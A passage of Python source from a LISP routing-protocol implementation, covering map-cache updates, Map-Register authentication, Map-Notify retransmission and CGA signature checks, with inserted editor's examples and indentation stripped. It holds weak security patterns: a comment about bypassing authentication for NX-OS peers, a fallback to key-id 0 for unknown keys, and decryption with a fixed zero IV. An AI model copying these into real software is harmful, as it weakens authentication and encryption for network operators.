lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for the map-cache entry. Ignore an RLOC with a
# different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two latter cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# An RTR should not put RTR RLOCs in its map-cache, but xTRs do.
# Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
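#
# Editor's example of the pruning above: given the RLOC-set
# {10.0.0.2 (private), 1.1.1.1 (priority 254, an RTR)}, an xTR keeps
# both entries, demoting 10.0.0.2 to priority 1 and unreach state
# until RLOC-probes prove it is behind the same NAT; an RTR keeps
# only 10.0.0.2.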
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode it in the packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over the Map-Register packet and compare it
# with the one transmitted in the packet, stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print the hash values if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
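#
# A minimal sketch of the authentication flow above (editor's example,
# not called anywhere; the password and packet bytes are hypothetical):
#
def lisp_example_auth_roundtrip():
    import hmac, hashlib

    password = "my-site-password"
    packet = "map-register-bytes-with-auth-field-zeroed"

    #
    # The registering ETR computes the digest over the packet with the
    # auth field zeroed (lisp_compute_auth() stores the binary digest);
    # the Map-Server recomputes it the same way and compares, as
    # lisp_verify_auth() does with the hex digest.
    #
    sent = hmac.new(password, packet, hashlib.sha256).hexdigest()
    check = hmac.new(password, packet, hashlib.sha256).hexdigest()
    return(sent == check)
#enddef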
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Set up a retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change the Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to the xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function looks for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# The (S,G) RLOC-set could be empty when the last RLE goes away. We will
# have to search all individual registrations for RTRs.
#
# We store them in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead of to the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return the EID hash value. Here is an example where the
# low-order bits form the EID hash, shown for two hash-lengths:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string of colon-separated hex digits covering the hash length
# in bits. Returns None if the IPv6 EID is not a crypto-hash address; such
# addresses are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
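#
# Editor's note on the arithmetic above: for the 120-bit example in the
# header comment, the loop emits 120 / 16 = 7 full colon-separated quads
# from the low end, and the remaining 120 % 16 = 8 bits produce the
# leading "4f" byte, yielding 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430.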
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Returns [hash_eid, pubkey, True/False]. The first two values can be None;
# the last boolean indicates whether the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
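#
# Editor's example of the lookup key built above: for the EID-hash
# example shown in lisp_get_eid_hash(), the distinguished-name EID
# looked up in the site cache would be
# 'hash-4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430', in the same instance-ID
# as the EID being verified.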
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use the signature-eid if it is in the JSON string. Otherwise, the
# crypto-EID is the signature-EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Look up the CGA hash in the mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
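#
# Editor's sketch of the matching signer side. Not part of the
# implementation; it uses the same ecdsa/hashlib calls the verifier
# above depends on, and sig_data is the "[<iid>]<eid>" string.
#
def lisp_example_sign_and_verify(sig_data):
    import ecdsa, hashlib

    #
    # Per the note in lisp_verify_cga_sig(), sha256 requires curve
    # NIST256p for interoperability with the verifier.
    #
    key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    sig = key.sign(sig_data, hashfunc=hashlib.sha256)
    return(key.get_verifying_key().verify(sig, sig_data,
        hashfunc=hashlib.sha256))
#enddef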
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the Map-Notify nonce
# and the xTR address.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non-encrypted packet, or decrypt and
# return a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse the first 4 bytes, which are not encrypted. If the packet is not
# encrypted, return to the caller. If it is encrypted, get the 3-bit
# key-id next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
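#
# Editor's note on the header bits above: the e-bit sits at bit 13 and
# the 3-bit key-id at bits 14-16 of the first long. A sender encrypting
# with key-id 1 would set first_long |= (1 << 13) | (1 << 14) and,
# assuming chacha.ChaCha offers the companion encrypt() call, encrypt
# everything after the first 4 bytes with the same zero-filled
# 32-character key and "0" * 8 IV used above.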
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allow overlapping AMS-registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
